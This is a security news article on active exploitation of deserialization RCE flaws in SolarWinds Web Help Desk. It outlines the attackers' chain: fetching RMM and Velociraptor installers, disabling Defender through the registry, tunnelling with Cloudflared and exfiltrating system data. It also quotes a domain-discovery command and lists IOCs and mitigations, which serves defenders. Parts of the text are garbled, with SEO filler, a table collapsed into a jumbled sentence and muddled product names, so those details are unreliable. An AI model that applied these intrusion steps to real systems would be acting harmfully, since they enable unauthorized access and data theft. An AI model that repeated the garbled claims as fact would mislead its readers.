Critical remote code execution (RCE) vulnerabilities in SolarWinds Web Help Desk (WHD) are being targeted by cyber threat actors This article explores rce vulnerabilities solarwinds. . On February 7, 2026, the security company Huntress disclosed active exploits in three customer environments.

In order to gain persistent access, attackers utilize these vulnerabilities to install programs like Velociraptor and Zoho Assist. Overview of Vulnerabilities The SolarWinds Untrusted deserialization bugs plague WHD, a well-known IT help desk tool that runs on Tomcat. These enable unauthenticated RCE, which enables hackers to execute code without requiring login credentials. versions prior to 12.8.7 HF1 (or 2026).1) are vulnerable; CISA added CVE-2025-40551 to its list of known exploited vulnerabilities.

The exploit begins with wrapper.exe spawning java.exe, after which cmd.exe retrieves an MSI for Zoho ManageEngine RMM (TOOLSIQ.EXE) from Catbox. This makes remote control possible through an account connected to Proton Mail.

The attackers then install Velociraptor 0.73.4 MSI from Supabase and perform AD discovery using "net group 'domain computers' /domain." They then install Cloudflared for tunnels, disable Defender/Firewall through registry edits, and exfiltrate system information to Elastic Cloud on GCP (using Get-ComputerInfo). Timeline for Help Desk Attacks Using HTTP 406 signals, a failover script moves Velociraptor C2 from Cloudflare Workers to v2-api.mooo.com.

QEMU-based SSH backdoors through tasks like TPMProfiler are part of persistence. CVSS Score Description Status CVE-2025-40551 CVE ID Critical Deserialization Without Trust Actively exploited RCE; CISA KEV CVE-2025-26399 CVE-2025-40536 High Related deserialization flaw Actively exploited by Critical Untrusted deserialization RCE Patch needed: Huntress uses WHD to monitor 84 endpoints across 78 organizations. On February 6, Microsoft confirmed similar activity.

Attackers combine legitimate tools like Velociraptor (DFIR) for C2 with Elastic to create custom SIEMs for victim triage. Update right away to SolarWinds WHD 2026.1 or later. Block public access and conceal admin interfaces behind firewalls and VPNs.

Look for IOCs: Velociraptor server auth.qgtxtebl.workers.dev, Zoho MSI (SHA256: 897eae49e6c32de3f4bfa229ad4f2d6e56bcf7a39c6c962d02e5c85cd538a189). Reset credentials, check for RMM tools, and keep an eye on java.exe spawns. To stop these direct attacks, organizations need to move quickly. Patches and network reviews are recommended by Huntress and vendors such as Microsoft.